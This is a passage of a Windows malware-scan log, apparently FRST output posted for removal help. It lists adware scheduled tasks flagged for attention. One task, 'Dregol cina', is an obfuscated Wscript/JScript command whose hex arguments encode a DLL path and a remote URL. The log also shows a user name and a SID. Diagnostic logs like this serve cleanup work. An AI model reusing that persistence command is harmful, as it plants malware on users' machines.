VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Wajam (HKLM\...\WajIEn) (Version: 1.47.5.13 (i1.0) - Wajam) <==== ATTENTION
WinRAR 5.21 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3110752661-1710530649-2414096437-1001_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\localserver32 -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)

==================== Restore Points =========================

25-07-2015 12:23:55 Installed AVG 2015
25-07-2015 12:26:25 Installed AVG 2015
25-07-2015 14:28:21 Removed Visual Studio 2012 x86 Redistributables
25-07-2015 15:36:08 Removed TuneUp Utilities 2014
25-07-2015 15:37:00 Removed TuneUp Utilities 2014 (en-US)
25-07-2015 15:38:50 Removed AVG 2015
25-07-2015 15:41:38 Removed AVG 2015
25-07-2015 18:36:55 Windows Modules Installer
25-07-2015 18:44:07 Windows Modules Installer
25-07-2015 21:49:48 Restore Operation
25-07-2015 22:56:39 Windows Modules Installer

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 14:04 - 2009-06-10 09:39 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {02CB52C8-2505-435B-8996-B502C78230F1} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-06-12] (Adobe Systems Incorporated)
Task: {04190EDF-19EF-4947-AC65-B1A4331041C9} - System32\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-1-6 => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-1-6.exe <==== ATTENTION
Task: {07808B8C-CA85-4A0F-9049-3070D600C501} - System32\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-6 => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-6.exe <==== ATTENTION
Task: {0A5ACE17-4CEC-4212-9DA4-0C06A1297639} - System32\Tasks\globalUpdateUpdateTaskMachineCore => C:\Program Files\globalUpdate\Update\globalupdate.exe [2015-07-14] (globalUpdate) <==== ATTENTION
Task: {0F010781-7D78-476D-8107-963A2CE94EA5} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-4 No Task File <==== ATTENTION
Task: {0F1AAC08-47C6-4C26-9F4F-87C71B5C0092} - System32\Tasks\Opera scheduled Autoupdate 1436238770 => C:\Program Files\Opera\launcher.exe [2015-07-10] (Opera Software)
Task: {16B4CC44-24F7-4D36-B596-876A3170BA43} - System32\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-5_user => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-5.exe <==== ATTENTION
Task: {198534E3-0B42-40B0-923D-42FB297F6504} - \aec13a97-93b2-4738-96e9-978ab384cb13-4 No Task File <==== ATTENTION
Task: {1EC86838-8DBF-4F57-98EC-86267AE374C7} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-10_user => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-10.exe <==== ATTENTION
Task: {1F831148-D10E-4BF2-92C5-62B5222A0A35} - System32\Tasks\{90B60966-ED53-4101-A190-E458620B2F2A} => pcalua.exe -a C:\Windows\system32\pcwrun.exe -c "C:\Program Files\VideoLAN\VLC\vlc.exe"
Task: {21E49265-03A3-467C-9035-B479763435E8} - System32\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-5_user => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-5.exe <==== ATTENTION
Task: {2B2DCE39-8341-43D1-B829-96DA4BB4DD2E} - System32\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5_user => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5.exe <==== ATTENTION
Task: {2B960881-7C18-490A-8C08-DAF82CB5AA6E} - System32\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-6 => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-6.exe <==== ATTENTION
Task: {3305264B-6466-426A-BC4E-0AD7B82C2CD3} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-5_user => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-5.exe <==== ATTENTION
Task: {34F04A27-5DCC-4CE4-916F-67C9B54DD26F} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-7 No Task File <==== ATTENTION
Task: {3A2382AF-BF5C-409F-A953-C3907A8342B5} - \TuneInPro No Task File <==== ATTENTION
Task: {3B7AD0F0-5129-4168-98E1-90E4E4C4F6A9} - \aec13a97-93b2-4738-96e9-978ab384cb13-3 No Task File <==== ATTENTION
Task: {3E084B2F-A9AC-4717-9327-4322D2AFA693} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-6 No Task File <==== ATTENTION
Task: {3F02B966-A1DF-4571-9226-57573902FBAA} - \aec13a97-93b2-4738-96e9-978ab384cb13-11 No Task File <==== ATTENTION
Task: {4489080A-01B9-428A-809D-D0D27B9BDDEF} - System32\Tasks\Dregol cina => Wscript.exe "C:\ProgramData\{9A2272E1-CAA0-A367-7B26-D3E5ABA4006B}\2.0.1.9\date.txt" "433a2f50726f6772616d446174612f7b39413232373245312d434141302d413336372d374232362d4433453541424134303036427d2f322e302e312e392f63696e612e646c6c" "687474703a2f2f73616f2e7265716472652e636f6d2f" "--IsErIk" "//E:jscript"
Task: {479AA25B-837B-4640-B1F3-34339D871535} - \7ac5c440-fd07-4e61-a049-8edfc7759672-3 No Task File <==== ATTENTION
Task: {4BCF5A6D-60B1-4F30-81E6-A871B337079D} - System32\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-10_user => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-10.exe <==== ATTENTION
Task: {4DA17D03-2325-4BED-825B-551B1439EC96} - \35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5 No Task File <==== ATTENTION
Task: {50D79D96-6A26-4068-871E-BD15E72ECF6A} - \APSnotifierPP1 No Task File <==== ATTENTION
Task: {5529B242-EAED-41DA-93AF-4F351C55278E} - System32\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-6 => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-6.exe <==== ATTENTION
Task: {577BBA3B-CA0F-4447-95D0-50E9A681C0BB} - \35aa6d8e-8d62-46d5-85c6-1ba7c9408914-3 No Task File <==== ATTENTION
Task: {5F4B1C19-11E6-41B2-80E7-5E53AF502178} - System32\Tasks\DriverToolkit Autorun => C:\Program Files\DriverToolkit\DriverToolkit.exe [2014-09-20] (Megaify Software Co., Ltd.)
Task: {62AC7910-5FE8-41AB-B722-2025DA31E752} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-7 => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-7.exe <==== ATTENTION
Task: {66062F97-C34B-4AA2-BB86-572AFC98AD9E} - System32\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-6 => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-6.exe <==== ATTENTION
Task: {6759CA88-95A4-4856-A6D6-4DDCBBECD125} - \7ac5c440-fd07-4e61-a049-8edfc7759672-1-7 No Task File <==== ATTENTION
Task: {696F20A9-4DE7-4DD6-9ECB-E950A9336C74} - \7ac5c440-fd07-4e61-a049-8edfc7759672-5 No Task File <==== ATTENTION
Task: {6DFEFC15-D248-4BAD-9E19-44B007DD3204} - \35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-7 No Task File <==== ATTENTION
Task: {6E6C02DF-0C7E-4423-BA24-631F79DFD847} - \98d446af-8794-4b83-b37f-028ad13d59d8-1-7 No Task File <==== ATTENTION
Task: {6F9AD10A-406C-4AF3-A21D-E4E9EF10780D} - System32\Tasks\{3EC43F45-D128-4FDC-A5BF-284B5DD6C4F2} => pcalua.exe -a C:\Users\Cukwenk\AppData\Local\Temp\jre-8u45-windows-au.exe -d C:\Windows\system32 -c /installmethod=jau FAMILYUPGRADE=1
Task: {725BF4AC-0FF8-495C-8874-90D03FCBB83C} - \98d446af-8794-4b83-b37f-028ad13d59d8-4 No Task File <==== ATTENTION
Task: {74849035-AA71-4055-AA78-E183793F541E} - System32\Tasks\APSnotifierPP3 => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: {76142B85-AE4D-43A4-A2D5-5CCF74F9080A} - System32\Tasks\{F3014417-10B1-42E7-9724-EFDD6C63BC30} => pcalua.exe -a C:\Users\Cukwenk\AppData\Roaming\mystartsearch\UninstallManager.exe -c  -ptid=cmi
Task: {7915197C-4F92-45BB-8C9E-ECCBDE30A520} - System32\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-6 => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-6.exe <==== ATTENTION
Task: {7DE4D457-DB5F-44C3-A9B2-32D83D4CD852} - \35aa6d8e-8d62-46d5-85c6-1ba7c9408914-4 No Task File <==== ATTENTION
Task: {7E41AA52-14D7-404E-B46B-076D0BB44F7F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-22] (Adobe Systems Incorporated)
Task: {81DB658C-F128-4C81-8688-AF98EAE1AD07} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-07-25] (Google Inc.)
Task: {85F14A70-4033-4A8F-A4BF-2B0FFEA4FB08} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-07-25] (Google Inc.)
Task: {8AFE2994-A92F-4674-8B6D-6CF1708D3B6F} - \7ac5c440-fd07-4e61-a049-8edfc7759672-7 No Task File <==== ATTENTION
Task: {904EE556-9F19-4E53-89F4-0E5AF9F0207C} - System32\Tasks\ASP => C:\Program Files\RCP\systweakasp.exe
Task: {98C8C41D-978A-49CA-BD29-AA30C1DFAE6D} - System32\Tasks\Crossbrowse => C:\Program Files\Crossbrowse\Crossbrowse\Application\utility.exe <==== ATTENTION
Task: {992BF276-0A1A-4149-8925-367F8A787A52} - System32\Tasks\{14700DA3-28ED-43C2-A0CD-C9E5AD411CE6} => C:\Program Files\VideoLAN\VLC\vlc.exe [2015-04-13] (VideoLAN)
Task: {997C5ADB-6679-4173-88F9-2E7E172FC02E} - \AmiUpdXp No Task File <==== ATTENTION
Task: {9BB0DC6E-2390-4FA5-BB74-9B346EBA01BF} - System32\Tasks\globalUpdateUpdateTaskMachineUA => C:\Program Files\globalUpdate\Update\globalupdate.exe [2015-07-14] (globalUpdate) <==== ATTENTION
Task: {9DC0E81C-2DF0-4D7C-9573-28CD1900B579} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-3 No Task File <==== ATTENTION
Task: {9F47E059-6EA7-441E-A2C2-B55E84B2AD7A} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-11 => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-11.exe <==== ATTENTION
Task: {A090BC50-B02F-4171-9111-DED913CE5C86} - \98d446af-8794-4b83-b37f-028ad13d59d8-5 No Task File <==== ATTENTION
Task: {A1DA6487-03EF-4A2B-89E3-6EAE7BC198E4} - \35aa6d8e-8d62-46d5-85c6-1ba7c9408914-11 No Task File <==== ATTENTION
Task: {A2497EB2-5072-4ED2-B4B9-F0433342A109} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-7 No Task File <==== ATTENTION
Task: {A856D036-CC75-4D1C-B004-B3B86E6B54CA} - \aec13a97-93b2-4738-96e9-978ab384cb13-1-6 No Task File <==== ATTENTION
Task: {AAEAE9C6-2D57-4064-8CD9-D201AC086727} - \7ac5c440-fd07-4e61-a049-8edfc7759672-10_user No Task File <==== ATTENTION
Task: {ADCA9788-234C-48A5-AE79-5A8EED9325D2} - System32\Tasks\Dlvfecrd => C:\Program Files\shopperz\Mlsaizwav.bat [2015-07-01] () <==== ATTENTION
Task: {B7B20E6D-8C97-4236-A2D7-C7A2F771B734} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5 No Task File <==== ATTENTION
Task: {C743BC85-5A33-418A-B7FB-BBE158A61DC1} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-6 => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-6.exe <==== ATTENTION
Task: {CFBAA0D9-448D-45EA-B0C3-75764B2F1ECC} - \aec13a97-93b2-4738-96e9-978ab384cb13-5 No Task File <==== ATTENTION
Task: {D10CE50F-1D9B-4AC3-A34B-66889F5CAC96} - \35aa6d8e-8d62-46d5-85c6-1ba7c9408914-7 No Task File <==== ATTENTION
Task: {D57C3679-E7BB-4E35-B28E-D92041527F40} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {D714A91F-0E89-43B7-BECD-8393186B2726} - System32\Tasks\Run_Dregol => C:\Users\Cukwenk\AppData\Local\{8550B~1\UNINST~1.EXE
Task: {D8B87F7A-6902-49A5-AFF8-BE69D84268EE} - System32\Tasks\APSnotifierPP2 => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: {DD63C69A-BF5F-4BC4-9EF1-EA95B16F81EE} - System32\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-10_user => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-10.exe <==== ATTENTION
Task: {EE3580FC-FB80-4AAA-A165-EEFDDC697BEF} - System32\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-10_user => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-10.exe <==== ATTENTION
Task: {EF070D96-8DDB-4121-A948-C88F29DE5F1C} - System32\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5_user => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5.exe <==== ATTENTION
Task: {F38EA665-4F72-4480-9ABF-478F99C1F8F9} - \aec13a97-93b2-4738-96e9-978ab384cb13-7 No Task File <==== ATTENTION
Task: {F47A80F5-A62E-4A16-9B2D-3F097035C560} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-3 => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-3.exe <==== ATTENTION
Task: {F52B0961-AB29-480E-97E9-55A61DA04F6B} - \aec13a97-93b2-4738-96e9-978ab384cb13-1-7 No Task File <==== ATTENTION
Task: {F8209B84-EE29-40A9-BB6F-46F2984469A7} - System32\Tasks\Advanced System~Protector => C:\Program Files\ASP\AspManager.exe [2015-06-30] ()
Task: {FAD173F5-EB96-4143-A3C5-948A1557E241} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-1-6 => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-1-6.exe <==== ATTENTION
Task: {FBBB7A6E-0BC9-425A-A4D7-CD83BE342E0A} - System32\Tasks\Advanced System~Protector_startup => C:\Program Files\ASP\AdvancedSystemProtector.exe [2015-06-30] () <==== ATTENTION
Task: {FCB3347D-A432-4038-A391-D28F97A23FA8} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-11 No Task File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-6.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-7.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-10_user.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-11.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-3.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-4.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5_user.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-6.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-7.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-6.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-7.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-10_user.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-11.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-3.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-4.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5_user.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-6.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-7.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-1-6.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-1-7.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-10_user.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-3.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-5.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-5_user.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-6.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-7.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-1-6.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-1-7.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-10_user.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-11.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-3.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-4.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-5.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-5_user.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-6.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-7.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-1-6.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-1-7.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-10_user.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-11.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-3.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-4.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-5.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-5_user.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-6.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-7.job => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\AmiUpdXp.job => C:\Users\Cukwenk\AppData\Local\14536\Updater.exe <==== ATTENTION
Task: C:\Windows\Tasks\APSnotifierPP1.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: C:\Windows\Tasks\APSnotifierPP2.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: C:\Windows\Tasks\APSnotifierPP3.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: C:\Windows\Tasks\Crossbrowse.job => C:\Program Files\Crossbrowse\Crossbrowse\Application\utility.exe <==== ATTENTION
Task: C:\Windows\Tasks\DriverToolkit Autorun.job => C:\Program Files\DriverToolkit\DriverToolkit.exe
Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job => C:\Program Files\globalUpdate\Update\globalupdate.exe <==== ATTENTION
Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job => C:\Program Files\globalUpdate\Update\globalupdate.exe <==== ATTENTION
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0c79a310c975b.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\RsDelayLauncher_{8A34248E-7D35-4832-8378-7659E0B0A380}.job => C:\PROGRAM FILES\RISING\RAV\rsdelaylauncher.exe
Task: C:\Windows\Tasks\Run_Dregol.job =>
Task: C:\Windows\Tasks\TuneInPro.job => c:\programdata\{c9a57a36-327b-fad7-c9a5-57a36327e8d8}\setup.exe <==== ATTENTION
Task: C:\Windows\Tasks\User_Feed_Synchronization-{3616E477-7CF5-4B18-A6F2-C9A0B002010D}.job => C:\Windows\system32\msfeedssync.exe

==================== Loaded Modules (Whitelisted) ==============

2015-07-25 12:02 - 2015-07-25 12:02 - 00481632 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\sqlite.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00100704 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\tinyxml.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00088416 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\zlib.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00203104 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQFileFlt.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00063840 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\plugins\qmiemalrtpplugin\qmiemalrtpplugin.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00039776 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\plugins\sysspeeduprtpplugin\SysSpeedupRtpPlugin.dll
2015-07-25 12:02 - 2015-07-25 12:02 - 00018784 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\oDayProtect.dll
2015-07-25 11:30 - 2015-07-25 11:30 - 00161792 _____ () C:\Program Files\CD674440-1437866985-11E1-8EA2-047D7BFA1DE9\hnso7C13.tmp
2015-07-25 12:02 - 2015-07-25 12:02 - 00137568 _____ () C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\libexpatw.dll
